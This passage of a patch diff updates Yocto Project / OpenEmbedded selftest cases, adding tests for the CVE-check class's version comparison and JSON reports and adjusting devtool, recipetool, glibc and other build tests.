+from oeqa.utils.commands import bitbake, get_bb_vars
+
+class CVECheck(OESelftestTestCase):
+
+ def test_version_compare(self):
+ from oe.cve_check import Version
+
+ result = Version("100") > Version("99")
+ self.assertTrue( result, msg="Failed to compare version '100' > '99'")
+ result = Version("2.3.1") > Version("2.2.3")
+ self.assertTrue( result, msg="Failed to compare version '2.3.1' > '2.2.3'")
+ result = Version("2021-01-21") > Version("2020-12-25")
+ self.assertTrue( result, msg="Failed to compare version '2021-01-21' > '2020-12-25'")
+ result = Version("1.2-20200910") < Version("1.2-20200920")
+ self.assertTrue( result, msg="Failed to compare version '1.2-20200910' < '1.2-20200920'")
+
+ result = Version("1.0") >= Version("1.0beta")
+ self.assertTrue( result, msg="Failed to compare version '1.0' >= '1.0beta'")
+ result = Version("1.0-rc2") > Version("1.0-rc1")
+ self.assertTrue( result, msg="Failed to compare version '1.0-rc2' > '1.0-rc1'")
+ result = Version("1.0.alpha1") < Version("1.0")
+ self.assertTrue( result, msg="Failed to compare version '1.0.alpha1' < '1.0'")
+ result = Version("1.0_dev") <= Version("1.0")
+ self.assertTrue( result, msg="Failed to compare version '1.0_dev' <= '1.0'")
+
+ # ignore "p1" and "p2", so these should be equal
+ result = Version("1.0p2") == Version("1.0p1")
+ self.assertTrue( result ,msg="Failed to compare version '1.0p2' to '1.0p1'")
+ # ignore the "b" and "r"
+ result = Version("1.0b") == Version("1.0r")
+ self.assertTrue( result ,msg="Failed to compare version '1.0b' to '1.0r'")
+
+ # consider the trailing alphabet as patched level when comparing
+ result = Version("1.0b","alphabetical") < Version("1.0r","alphabetical")
+ self.assertTrue( result ,msg="Failed to compare version with suffix '1.0b' < '1.0r'")
+ result = Version("1.0b","alphabetical") > Version("1.0","alphabetical")
+ self.assertTrue( result ,msg="Failed to compare version with suffix '1.0b' > '1.0'")
+
+ # consider the trailing "p" and "patch" as patched released when comparing
+ result = Version("1.0","patch") < Version("1.0p1","patch")
+ self.assertTrue( result ,msg="Failed to compare version with suffix '1.0' < '1.0p1'")
+ result = Version("1.0p2","patch") > Version("1.0p1","patch")
+ self.assertTrue( result ,msg="Failed to compare version with suffix '1.0p2' > '1.0p1'")
+ result = Version("1.0_patch2","patch") < Version("1.0_patch3","patch")
+ self.assertTrue( result ,msg="Failed to compare version with suffix '1.0_patch2' < '1.0_patch3'")
+
+
+ def test_convert_cve_version(self):
+ from oe.cve_check import convert_cve_version
+
+ # Default format
+ self.assertEqual(convert_cve_version("8.3"), "8.3")
+ self.assertEqual(convert_cve_version(""), "")
+
+ # OpenSSL format version
+ self.assertEqual(convert_cve_version("1.1.1t"), "1.1.1t")
+
+ # OpenSSH format
+ self.assertEqual(convert_cve_version("8.3_p1"), "8.3p1")
+ self.assertEqual(convert_cve_version("8.3_p22"), "8.3p22")
+
+ # Linux kernel format
+ self.assertEqual(convert_cve_version("6.2_rc8"), "6.2-rc8")
+ self.assertEqual(convert_cve_version("6.2_rc31"), "6.2-rc31")
+
+
+ def test_recipe_report_json(self):
+ config = """
+INHERIT += "cve-check"
+CVE_CHECK_FORMAT_JSON = "1"
+"""
+ self.write_config(config)
+
+ vars = get_bb_vars(["CVE_CHECK_SUMMARY_DIR", "CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+ summary_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], vars["CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+ recipe_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], "m4-native_cve.json")
+
+ try:
+ os.remove(summary_json)
+ os.remove(recipe_json)
+ except FileNotFoundError:
+ pass
+
+ bitbake("m4-native -c cve_check")
+
+ def check_m4_json(filename):
+ with open(filename) as f:
+ report = json.load(f)
+ self.assertEqual(report["version"], "1")
+ self.assertEqual(len(report["package"]), 1)
+ package = report["package"][0]
+ self.assertEqual(package["name"], "m4-native")
+ found_cves = { issue["id"]: issue["status"] for issue in package["issue"]}
+ self.assertIn("CVE-2008-1687", found_cves)
+ self.assertEqual(found_cves["CVE-2008-1687"], "Patched")
+
+ self.assertExists(summary_json)
+ check_m4_json(summary_json)
+ self.assertExists(recipe_json)
+ check_m4_json(recipe_json)
+
+
+ def test_image_json(self):
+ config = """
+INHERIT += "cve-check"
+CVE_CHECK_FORMAT_JSON = "1"
+"""
+ self.write_config(config)
+
+ vars = get_bb_vars(["CVE_CHECK_DIR", "CVE_CHECK_SUMMARY_DIR", "CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+ report_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], vars["CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+ print(report_json)
+ try:
+ os.remove(report_json)
+ except FileNotFoundError:
+ pass
+
+ bitbake("core-image-minimal-initramfs")
+ self.assertExists(report_json)
+
+ # Check that the summary report lists at least one package
+ with open(report_json) as f:
+ report = json.load(f)
+ self.assertEqual(report["version"], "1")
+ self.assertGreater(len(report["package"]), 1)
+
+ # Check that a random recipe wrote a recipe report to deploy/cve/
+ recipename = report["package"][0]["name"]
+ recipe_report = os.path.join(vars["CVE_CHECK_DIR"], recipename + "_cve.json")
+ self.assertExists(recipe_report)
+ with open(recipe_report) as f:
+ report = json.load(f)
+ self.assertEqual(report["version"], "1")
+ self.assertEqual(len(report["package"]), 1)
+ self.assertEqual(report["package"][0]["name"], recipename)
+
+
+ def test_recipe_report_json_unpatched(self):
+ config = """
+INHERIT += "cve-check"
+CVE_CHECK_FORMAT_JSON = "1"
+CVE_CHECK_REPORT_PATCHED = "0"
+"""
+ self.write_config(config)
+
+ vars = get_bb_vars(["CVE_CHECK_SUMMARY_DIR", "CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+ summary_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], vars["CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+ recipe_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], "m4-native_cve.json")
+
+ try:
+ os.remove(summary_json)
+ os.remove(recipe_json)
+ except FileNotFoundError:
+ pass
+
+ bitbake("m4-native -c cve_check")
+
+ def check_m4_json(filename):
+ with open(filename) as f:
+ report = json.load(f)
+ self.assertEqual(report["version"], "1")
+ self.assertEqual(len(report["package"]), 1)
+ package = report["package"][0]
+ self.assertEqual(package["name"], "m4-native")
+ #m4 had only Patched CVEs, so the issues array will be empty
+ self.assertEqual(package["issue"], [])
+
+ self.assertExists(summary_json)
+ check_m4_json(summary_json)
+ self.assertExists(recipe_json)
+ check_m4_json(recipe_json)
+
+
+ def test_recipe_report_json_ignored(self):
+ config = """
+INHERIT += "cve-check"
+CVE_CHECK_FORMAT_JSON = "1"
+CVE_CHECK_REPORT_PATCHED = "1"
+"""
+ self.write_config(config)
+
+ vars = get_bb_vars(["CVE_CHECK_SUMMARY_DIR", "CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+ summary_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], vars["CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+ recipe_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], "logrotate_cve.json")
+
+ try:
+ os.remove(summary_json)
+ os.remove(recipe_json)
+ except FileNotFoundError:
+ pass
+
+ bitbake("logrotate -c cve_check")
+
+ def check_m4_json(filename):
+ with open(filename) as f:
+ report = json.load(f)
+ self.assertEqual(report["version"], "1")
+ self.assertEqual(len(report["package"]), 1)
+ package = report["package"][0]
+ self.assertEqual(package["name"], "logrotate")
+ found_cves = { issue["id"]: issue["status"] for issue in package["issue"]}
+ # m4 CVE should not be in logrotate
+ self.assertNotIn("CVE-2008-1687", found_cves)
+ # logrotate has both Patched and Ignored CVEs
+ self.assertIn("CVE-2011-1098", found_cves)
+ self.assertEqual(found_cves["CVE-2011-1098"], "Patched")
+ self.assertIn("CVE-2011-1548", found_cves)
+ self.assertEqual(found_cves["CVE-2011-1548"], "Ignored")
+ self.assertIn("CVE-2011-1549", found_cves)
+ self.assertEqual(found_cves["CVE-2011-1549"], "Ignored")
+ self.assertIn("CVE-2011-1550", found_cves)
+ self.assertEqual(found_cves["CVE-2011-1550"], "Ignored")
+
+ self.assertExists(summary_json)
+ check_m4_json(summary_json)
+ self.assertExists(recipe_json)
+ check_m4_json(recipe_json)
diff --git a/meta/lib/oeqa/selftest/cases/devtool.py b/meta/lib/oeqa/selftest/cases/devtool.py
index d8bf4aea08..9efe342a0d 100644
--- a/meta/lib/oeqa/selftest/cases/devtool.py
+++ b/meta/lib/oeqa/selftest/cases/devtool.py
@@ -8,6 +8,7 @@ import shutil
import tempfile
import glob
import fnmatch
+import unittest
import oeqa.utils.ftools as ftools
from oeqa.selftest.case import OESelftestTestCase
@@ -38,6 +39,13 @@ def setUpModule():
canonical_layerpath = os.path.realpath(canonical_layerpath) + '/'
edited_layers.append(layerpath)
oldmetapath = os.path.realpath(layerpath)
+
+ # when downloading poky from tar.gz some tests will be skipped (BUG 12389)
+ try:
+ runCmd('git rev-parse --is-inside-work-tree', cwd=canonical_layerpath)
+ except:
+ raise unittest.SkipTest("devtool tests require folder to be a git repo")
+
result = runCmd('git rev-parse --show-toplevel', cwd=canonical_layerpath)
oldreporoot = result.output.rstrip()
newmetapath = os.path.join(corecopydir, os.path.relpath(oldmetapath, oldreporoot))
@@ -57,7 +65,7 @@ def setUpModule():
if relpth.endswith('/'):
destdir = os.path.join(corecopydir, relpth)
# avoid race condition by not copying .pyc files YPBZ#13421,13803
- shutil.copytree(pth, destdir, ignore=ignore_patterns('*.pyc', '__pycache__'))
+ shutil.copytree(pth, destdir, ignore=shutil.ignore_patterns('*.pyc', '__pycache__'))
else:
destdir = os.path.join(corecopydir, os.path.dirname(relpth))
bb.utils.mkdirhier(destdir)
@@ -269,7 +277,7 @@ class DevtoolAddTests(DevtoolBase):
self.track_for_cleanup(tempdir)
pn = 'pv'
pv = '1.5.3'
- url = 'http://www.ivarch.com/programs/sources/pv-1.5.3.tar.bz2'
+ url = 'http://downloads.yoctoproject.org/mirror/sources/pv-1.5.3.tar.bz2'
result = runCmd('wget %s' % url, cwd=tempdir)
result = runCmd('tar xfv %s' % os.path.basename(url), cwd=tempdir)
srcdir = os.path.join(tempdir, '%s-%s' % (pn, pv))
@@ -340,7 +348,7 @@ class DevtoolAddTests(DevtoolBase):
checkvars['LIC_FILES_CHKSUM'] = 'file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263'
checkvars['S'] = '${WORKDIR}/git'
checkvars['PV'] = '0.1+git${SRCPV}'
- checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/dbus-wait;protocol=https'
+ checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/dbus-wait;protocol=https;branch=master'
checkvars['SRCREV'] = srcrev
checkvars['DEPENDS'] = set(['dbus'])
self._test_recipe_contents(recipefile, checkvars, [])
@@ -442,6 +450,7 @@ class DevtoolAddTests(DevtoolBase):
tempdir = tempfile.mkdtemp(prefix='devtoolqa')
self.track_for_cleanup(tempdir)
url = 'gitsm://git.yoctoproject.org/mraa'
+ url_branch = '%s;branch=master' % url
checkrev = 'ae127b19a50aa54255e4330ccfdd9a5d058e581d'
testrecipe = 'mraa'
srcdir = os.path.join(tempdir, testrecipe)
@@ -462,7 +471,7 @@ class DevtoolAddTests(DevtoolBase):
checkvars = {}
checkvars['S'] = '${WORKDIR}/git'
checkvars['PV'] = '1.0+git${SRCPV}'
- checkvars['SRC_URI'] = url
+ checkvars['SRC_URI'] = url_branch
checkvars['SRCREV'] = '${AUTOREV}'
self._test_recipe_contents(recipefile, checkvars, [])
# Try with revision and version specified
@@ -481,7 +490,7 @@ class DevtoolAddTests(DevtoolBase):
checkvars = {}
checkvars['S'] = '${WORKDIR}/git'
checkvars['PV'] = '1.5+git${SRCPV}'
- checkvars['SRC_URI'] = url
+ checkvars['SRC_URI'] = url_branch
checkvars['SRCREV'] = checkrev
self._test_recipe_contents(recipefile, checkvars, [])
@@ -693,7 +702,44 @@ class DevtoolModifyTests(DevtoolBase):
self.assertTrue(bbclassextended, 'None of these recipes are BBCLASSEXTENDed to native - need to adjust testrecipes list: %s' % ', '.join(testrecipes))
self.assertTrue(inheritnative, 'None of these recipes do "inherit native" - need to adjust testrecipes list: %s' % ', '.join(testrecipes))
+ def test_devtool_modify_localfiles_only(self):
+ # Check preconditions
+ testrecipe = 'base-files'
+ src_uri = (get_bb_var('SRC_URI', testrecipe) or '').split()
+ foundlocalonly = False
+ correct_symlink = False
+ for item in src_uri:
+ if item.startswith('file://'):
+ if '.patch' not in item:
+ foundlocalonly = True
+ else:
+ foundlocalonly = False
+ break
+ self.assertTrue(foundlocalonly, 'This test expects the %s recipe to fetch local files only and it seems that it no longer does' % testrecipe)
+ # Clean up anything in the workdir/sysroot/sstate cache
+ bitbake('%s -c cleansstate' % testrecipe)
+ # Try modifying a recipe
+ tempdir = tempfile.mkdtemp(prefix='devtoolqa')
+ self.track_for_cleanup(tempdir)
+ self.track_for_cleanup(self.workspacedir)
+ self.add_command_to_tearDown('bitbake -c clean %s' % testrecipe)
+ self.add_command_to_tearDown('bitbake-layers remove-layer */workspace')
+ result = runCmd('devtool modify %s -x %s' % (testrecipe, tempdir))
+ srcfile = os.path.join(tempdir, 'oe-local-files/share/dot.bashrc')
+ srclink = os.path.join(tempdir, 'share/dot.bashrc')
+ self.assertExists(srcfile, 'Extracted source could not be found')
+ if os.path.islink(srclink) and os.path.exists(srclink) and os.path.samefile(srcfile, srclink):
+ correct_symlink = True
+ self.assertTrue(correct_symlink, 'Source symlink to oe-local-files is broken')
+ matches = glob.glob(os.path.join(self.workspacedir, 'appends', '%s_*.bbappend' % testrecipe))
+ self.assertTrue(matches, 'bbappend not created')
+ # Test devtool status
+ result = runCmd('devtool status')
+ self.assertIn(testrecipe, result.output)
+ self.assertIn(tempdir, result.output)
+ # Try building
+ bitbake(testrecipe)
def test_devtool_modify_git(self):
# Check preconditions
@@ -843,7 +889,7 @@ class DevtoolUpdateTests(DevtoolBase):
self._check_repo_status(os.path.dirname(recipefile), expected_status)
result = runCmd('git diff %s' % os.path.basename(recipefile), cwd=os.path.dirname(recipefile))
- addlines = ['SRCREV = ".*"', 'SRC_URI = "git://git.infradead.org/mtd-utils.git"']
+ addlines = ['SRCREV = ".*"', 'SRC_URI = "git://git.infradead.org/mtd-utils.git;branch=master"']
srcurilines = src_uri.split()
srcurilines[0] = 'SRC_URI = "' + srcurilines[0]
srcurilines.append('"')
@@ -1285,7 +1331,7 @@ class DevtoolExtractTests(DevtoolBase):
# Now really test deploy-target
result = runCmd('devtool deploy-target -c %s root@%s' % (testrecipe, qemu.ip))
# Run a test command to see if it was installed properly
- sshargs = '-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no'
+ sshargs = '-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -o HostKeyAlgorithms=+ssh-rsa'
result = runCmd('ssh %s root@%s %s' % (sshargs, qemu.ip, testcommand))
# Check if it deployed all of the files with the right ownership/perms
# First look on the host - need to do this under pseudo to get the correct ownership/perms
diff --git a/meta/lib/oeqa/selftest/cases/diffoscope/A/file.txt b/meta/lib/oeqa/selftest/cases/diffoscope/A/file.txt
new file mode 100644
index 0000000000..f70f10e4db
--- /dev/null
+++ b/meta/lib/oeqa/selftest/cases/diffoscope/A/file.txt
@@ -0,0 +1 @@
+A
diff --git a/meta/lib/oeqa/selftest/cases/diffoscope/B/file.txt b/meta/lib/oeqa/selftest/cases/diffoscope/B/file.txt
new file mode 100644
index 0000000000..223b7836fb
--- /dev/null
+++ b/meta/lib/oeqa/selftest/cases/diffoscope/B/file.txt
@@ -0,0 +1 @@
+B
diff --git a/meta/lib/oeqa/selftest/cases/distrodata.py b/meta/lib/oeqa/selftest/cases/distrodata.py
index e1cfc3b621..8e5e24db3d 100644
--- a/meta/lib/oeqa/selftest/cases/distrodata.py
+++ b/meta/lib/oeqa/selftest/cases/distrodata.py
@@ -63,7 +63,7 @@ but their recipes claim otherwise by setting UPSTREAM_VERSION_UNKNOWN. Please re
return True
return False
- feature = 'require conf/distro/include/maintainers.inc\nLICENSE_FLAGS_WHITELIST += " commercial"\nPARSE_ALL_RECIPES = "1"\n'
+ feature = 'require conf/distro/include/maintainers.inc\nLICENSE_FLAGS_WHITELIST += " commercial"\nPARSE_ALL_RECIPES = "1"\nPACKAGE_CLASSES = "package_ipk package_deb package_rpm"\n'
self.write_config(feature)
with bb.tinfoil.Tinfoil() as tinfoil:
diff --git a/meta/lib/oeqa/selftest/cases/glibc.py b/meta/lib/oeqa/selftest/cases/glibc.py
index c687f6ef93..c1f6e4c1fb 100644
--- a/meta/lib/oeqa/selftest/cases/glibc.py
+++ b/meta/lib/oeqa/selftest/cases/glibc.py
@@ -33,7 +33,7 @@ class GlibcSelfTestBase(OESelftestTestCase, OEPTestResultTestCase):
ptestsuite = "glibc-user" if ssh is None else "glibc"
self.ptest_section(ptestsuite)
- with open(os.path.join(builddir, "tests.sum"), "r") as f:
+ with open(os.path.join(builddir, "tests.sum"), "r", errors='replace') as f:
for test, result in parse_values(f):
self.ptest_result(ptestsuite, test, result)
@@ -41,7 +41,7 @@ class GlibcSelfTestBase(OESelftestTestCase, OEPTestResultTestCase):
with contextlib.ExitStack() as s:
# use the base work dir, as the nfs mount, since the recipe directory may not exist
tmpdir = get_bb_var("BASE_WORKDIR")
- nfsport, mountport = s.enter_context(unfs_server(tmpdir))
+ nfsport, mountport = s.enter_context(unfs_server(tmpdir, udp = False))
# build core-image-minimal with required packages
default_installed_packages = [
@@ -61,7 +61,7 @@ class GlibcSelfTestBase(OESelftestTestCase, OEPTestResultTestCase):
bitbake("core-image-minimal")
# start runqemu
- qemu = s.enter_context(runqemu("core-image-minimal", runqemuparams = "nographic"))
+ qemu = s.enter_context(runqemu("core-image-minimal", runqemuparams = "nographic", qemuparams = "-m 1024"))
# validate that SSH is working
status, _ = qemu.run("uname")
@@ -70,7 +70,7 @@ class GlibcSelfTestBase(OESelftestTestCase, OEPTestResultTestCase):
# setup nfs mount
if qemu.run("mkdir -p \"{0}\"".format(tmpdir))[0] != 0:
raise Exception("Failed to setup NFS mount directory on target")
- mountcmd = "mount -o noac,nfsvers=3,port={0},udp,mountport={1} \"{2}:{3}\" \"{3}\"".format(nfsport, mountport, qemu.server_ip, tmpdir)
+ mountcmd = "mount -o noac,nfsvers=3,port={0},mountport={1} \"{2}:{3}\" \"{3}\"".format(nfsport, mountport, qemu.server_ip, tmpdir)
status, output = qemu.run(mountcmd)
if status != 0:
raise Exception("Failed to setup NFS mount on target ({})".format(repr(output)))
diff --git a/meta/lib/oeqa/selftest/cases/gotoolchain.py b/meta/lib/oeqa/selftest/cases/gotoolchain.py
index 3119520f0d..59f80aad28 100644
--- a/meta/lib/oeqa/selftest/cases/gotoolchain.py
+++ b/meta/lib/oeqa/selftest/cases/gotoolchain.py
@@ -43,6 +43,12 @@ class oeGoToolchainSelfTest(OESelftestTestCase):
@classmethod
def tearDownClass(cls):
+ # Go creates file which are readonly
+ for dirpath, dirnames, filenames in os.walk(cls.tmpdir_SDKQA):
+ for filename in filenames + dirnames:
+ f = os.path.join(dirpath, filename)
+ if not os.path.islink(f):
+ os.chmod(f, 0o775)
shutil.rmtree(cls.tmpdir_SDKQA, ignore_errors=True)
super(oeGoToolchainSelfTest, cls).tearDownClass()
diff --git a/meta/lib/oeqa/selftest/cases/imagefeatures.py b/meta/lib/oeqa/selftest/cases/imagefeatures.py
index 2b9c4998f7..535d80cb86 100644
--- a/meta/lib/oeqa/selftest/cases/imagefeatures.py
+++ b/meta/lib/oeqa/selftest/cases/imagefeatures.py
@@ -240,7 +240,7 @@ USERADD_GID_TABLES += "files/static-group"
def test_no_busybox_base_utils(self):
config = """
# Enable x11
-DISTRO_FEATURES_append += "x11"
+DISTRO_FEATURES_append = " x11"
# Switch to systemd
DISTRO_FEATURES += "systemd"
diff --git a/meta/lib/oeqa/selftest/cases/oelib/elf.py b/meta/lib/oeqa/selftest/cases/oelib/elf.py
index d0a28090f2..5a5f9b4fdf 100644
--- a/meta/lib/oeqa/selftest/cases/oelib/elf.py
+++ b/meta/lib/oeqa/selftest/cases/oelib/elf.py
@@ -21,6 +21,6 @@ class TestElf(TestCase):
self.assertEqual(oe.qa.elf_machine_to_string(0xB7), "AArch64")
self.assertEqual(oe.qa.elf_machine_to_string(0xF7), "BPF")
- self.assertEqual(oe.qa.elf_machine_to_string(0x00), "Unknown (0)")
+ self.assertEqual(oe.qa.elf_machine_to_string(0x00), "Unset")
self.assertEqual(oe.qa.elf_machine_to_string(0xDEADBEEF), "Unknown (3735928559)")
self.assertEqual(oe.qa.elf_machine_to_string("foobar"), "Unknown ('foobar')")
diff --git a/meta/lib/oeqa/selftest/cases/oelib/utils.py b/meta/lib/oeqa/selftest/cases/oelib/utils.py
index a7214beb4c..bbf67bf9c9 100644
--- a/meta/lib/oeqa/selftest/cases/oelib/utils.py
+++ b/meta/lib/oeqa/selftest/cases/oelib/utils.py
@@ -64,7 +64,7 @@ class TestMultiprocessLaunch(TestCase):
import bb
def testfunction(item, d):
- if item == "2" or item == "1":
+ if item == "2":
raise KeyError("Invalid number %s" % item)
return "Found %s" % item
@@ -99,5 +99,4 @@ class TestMultiprocessLaunch(TestCase):
# Assert the function prints exceptions
with captured_output() as (out, err):
self.assertRaises(bb.BBHandledException, multiprocess_launch, testfunction, ["1", "2", "3", "4", "5", "6"], d, extraargs=(d,))
- self.assertIn("KeyError: 'Invalid number 1'", out.getvalue())
self.assertIn("KeyError: 'Invalid number 2'", out.getvalue())
diff --git a/meta/lib/oeqa/selftest/cases/oescripts.py b/meta/lib/oeqa/selftest/cases/oescripts.py
index 726daff7c6..fb99be447e 100644
--- a/meta/lib/oeqa/selftest/cases/oescripts.py
+++ b/meta/lib/oeqa/selftest/cases/oescripts.py
@@ -133,7 +133,8 @@ class OEListPackageconfigTests(OEScriptTests):
def check_endlines(self, results, expected_endlines):
for line in results.output.splitlines():
for el in expected_endlines:
- if line.split() == el.split():
+ if line and line.split()[0] == el.split()[0] and \
+ ' '.join(sorted(el.split())) in ' '.join(sorted(line.split())):
expected_endlines.remove(el)
break
diff --git a/meta/lib/oeqa/selftest/cases/pkgdata.py b/meta/lib/oeqa/selftest/cases/pkgdata.py
index 833a1803ba..254abc40c6 100644
--- a/meta/lib/oeqa/selftest/cases/pkgdata.py
+++ b/meta/lib/oeqa/selftest/cases/pkgdata.py
@@ -218,3 +218,9 @@ class OePkgdataUtilTests(OESelftestTestCase):
def test_specify_pkgdatadir(self):
result = runCmd('oe-pkgdata-util -p %s lookup-pkg zlib' % get_bb_var('PKGDATA_DIR'))
self.assertEqual(result.output, 'libz1')
+
+ def test_no_param(self):
+ result = runCmd('oe-pkgdata-util', ignore_status=True)
+ self.assertEqual(result.status, 2, "Status different than 2. output: %s" % result.output)
+ currpos = result.output.find('usage: oe-pkgdata-util')
+ self.assertTrue(currpos != -1, msg = "Test is Failed. Help is not Displayed in %s" % result.output)
diff --git a/meta/lib/oeqa/selftest/cases/prservice.py b/meta/lib/oeqa/selftest/cases/prservice.py
index 85b534963d..fdc1e40058 100644
--- a/meta/lib/oeqa/selftest/cases/prservice.py
+++ b/meta/lib/oeqa/selftest/cases/prservice.py
@@ -23,7 +23,7 @@ class BitbakePrTests(OESelftestTestCase):
package_data_file = os.path.join(self.pkgdata_dir, 'runtime', package_name)
package_data = ftools.read_file(package_data_file)
find_pr = re.search(r"PKGR: r[0-9]+\.([0-9]+)", package_data)
- self.assertTrue(find_pr, "No PKG revision found in %s" % package_data_file)
+ self.assertTrue(find_pr, "No PKG revision found via regex 'PKGR: r[0-9]+\.([0-9]+)' in %s" % package_data_file)
return int(find_pr.group(1))
def get_task_stamp(self, package_name, recipe_task):
@@ -40,7 +40,7 @@ class BitbakePrTests(OESelftestTestCase):
return str(stamps[0])
def increment_package_pr(self, package_name):
- inc_data = "do_package_append() {\n bb.build.exec_func('do_test_prserv', d)\n}\ndo_test_prserv() {\necho \"The current date is: %s\"\n}" % datetime.datetime.now()
+ inc_data = "do_package_append() {\n bb.build.exec_func('do_test_prserv', d)\n}\ndo_test_prserv() {\necho \"The current date is: %s\" > ${PKGDESTWORK}/${PN}.datestamp\n}" % datetime.datetime.now()
self.write_recipeinc(package_name, inc_data)
res = bitbake(package_name, ignore_status=True)
self.delete_recipeinc(package_name)
@@ -63,7 +63,7 @@ class BitbakePrTests(OESelftestTestCase):
pr_2 = self.get_pr_version(package_name)
stamp_2 = self.get_task_stamp(package_name, track_task)
- self.assertTrue(pr_2 - pr_1 == 1, "Step between pkg revisions is not 1 (was %s - %s)" % (pr_2, pr_1))
+ self.assertTrue(pr_2 - pr_1 == 1, "New PR %s did not increment as expected (from %s), difference should be 1" % (pr_2, pr_1))
self.assertTrue(stamp_1 != stamp_2, "Different pkg rev. but same stamp: %s" % stamp_1)
def run_test_pr_export_import(self, package_name, replace_current_db=True):
@@ -75,7 +75,7 @@ class BitbakePrTests(OESelftestTestCase):
exported_db_path = os.path.join(self.builddir, 'export.inc')
export_result = runCmd("bitbake-prserv-tool export %s" % exported_db_path, ignore_status=True)
self.assertEqual(export_result.status, 0, msg="PR Service database export failed: %s" % export_result.output)
- self.assertTrue(os.path.exists(exported_db_path))
+ self.assertTrue(os.path.exists(exported_db_path), msg="%s didn't exist, tool output %s" % (exported_db_path, export_result.output))
if replace_current_db:
current_db_path = os.path.join(get_bb_var('PERSISTENT_DIR'), 'prserv.sqlite3')
@@ -89,7 +89,7 @@ class BitbakePrTests(OESelftestTestCase):
self.increment_package_pr(package_name)
pr_2 = self.get_pr_version(package_name)
- self.assertTrue(pr_2 - pr_1 == 1, "Step between pkg revisions is not 1 (was %s - %s)" % (pr_2, pr_1))
+ self.assertTrue(pr_2 - pr_1 == 1, "New PR %s did not increment as expected (from %s), difference should be 1" % (pr_2, pr_1))
def test_import_export_replace_db(self):
self.run_test_pr_export_import('m4')
diff --git a/meta/lib/oeqa/selftest/cases/pseudo.py b/meta/lib/oeqa/selftest/cases/pseudo.py
new file mode 100644
index 0000000000..33593d5ce9
--- /dev/null
+++ b/meta/lib/oeqa/selftest/cases/pseudo.py
@@ -0,0 +1,27 @@
+#
+# SPDX-License-Identifier: MIT
+#
+
+import glob
+import os
+import shutil
+from oeqa.utils.commands import bitbake, get_test_layer
+from oeqa.selftest.case import OESelftestTestCase
+
+class Pseudo(OESelftestTestCase):
+
+ def test_pseudo_pyc_creation(self):
+ self.write_config("")
+
+ metaselftestpath = get_test_layer()
+ pycache_path = os.path.join(metaselftestpath, 'lib/__pycache__')
+ if os.path.exists(pycache_path):
+ shutil.rmtree(pycache_path)
+
+ bitbake('pseudo-pyc-test -c install')
+
+ test1_pyc_present = len(glob.glob(os.path.join(pycache_path, 'pseudo_pyc_test1.*.pyc')))
+ self.assertTrue(test1_pyc_present, 'test1 pyc file missing, should be created outside of pseudo context.')
+
+ test2_pyc_present = len(glob.glob(os.path.join(pycache_path, 'pseudo_pyc_test2.*.pyc')))
+ self.assertFalse(test2_pyc_present, 'test2 pyc file present, should not be created in pseudo context.')
diff --git a/meta/lib/oeqa/selftest/cases/recipetool.py b/meta/lib/oeqa/selftest/cases/recipetool.py
index c2ade2543a..e8aeea3023 100644
--- a/meta/lib/oeqa/selftest/cases/recipetool.py
+++ b/meta/lib/oeqa/selftest/cases/recipetool.py
@@ -370,7 +370,7 @@ class RecipetoolTests(RecipetoolBase):
tempsrc = os.path.join(self.tempdir, 'srctree')
os.makedirs(tempsrc)
recipefile = os.path.join(self.tempdir, 'libmatchbox.bb')
- srcuri = 'git://git.yoctoproject.org/libmatchbox'
+ srcuri = 'git://git.yoctoproject.org/libmatchbox;branch=master'
result = runCmd(['recipetool', 'create', '-o', recipefile, srcuri + ";rev=9f7cf8895ae2d39c465c04cc78e918c157420269", '-x', tempsrc])
self.assertTrue(os.path.isfile(recipefile), 'recipetool did not create recipe file; output:\n%s' % result.output)
checkvars = {}
@@ -456,7 +456,7 @@ class RecipetoolTests(RecipetoolBase):
self.assertTrue(os.path.isfile(recipefile))
checkvars = {}
checkvars['LICENSE'] = set(['Apache-2.0'])
- checkvars['SRC_URI'] = 'git://github.com/mesonbuild/meson;protocol=https'
+ checkvars['SRC_URI'] = 'git://github.com/mesonbuild/meson;protocol=https;branch=master'
inherits = ['setuptools3']
self._test_recipe_contents(recipefile, checkvars, inherits)
@@ -523,7 +523,7 @@ class RecipetoolTests(RecipetoolBase):
self.assertTrue(os.path.isfile(recipefile))
checkvars = {}
checkvars['LICENSE'] = set(['GPLv2'])
- checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/matchbox-terminal;protocol=http'
+ checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/matchbox-terminal;protocol=http;branch=master'
inherits = ['pkgconfig', 'autotools']
self._test_recipe_contents(recipefile, checkvars, inherits)
diff --git a/meta/lib/oeqa/selftest/cases/reproducible.py b/meta/lib/oeqa/selftest/cases/reproducible.py
index 5d3959be77..be4cdcc429 100644
--- a/meta/lib/oeqa/selftest/cases/reproducible.py
+++ b/meta/lib/oeqa/selftest/cases/reproducible.py
@@ -17,6 +17,57 @@ import stat
import os
import datetime
+# For sample packages, see:
+# https://autobuilder.yocto.io/pub/repro-fail/oe-reproducible-20201127-0t7wr_oo/
+# https://autobuilder.yocto.io/pub/repro-fail/oe-reproducible-20201127-4s9ejwyp/
+# https://autobuilder.yocto.io/pub/repro-fail/oe-reproducible-20201127-haiwdlbr/
+# https://autobuilder.yocto.io/pub/repro-fail/oe-reproducible-20201127-hwds3mcl/
+# https://autobuilder.yocto.io/pub/repro-fail/oe-reproducible-20201203-sua0pzvc/
+# (both packages/ and packages-excluded/)
+exclude_packages = [
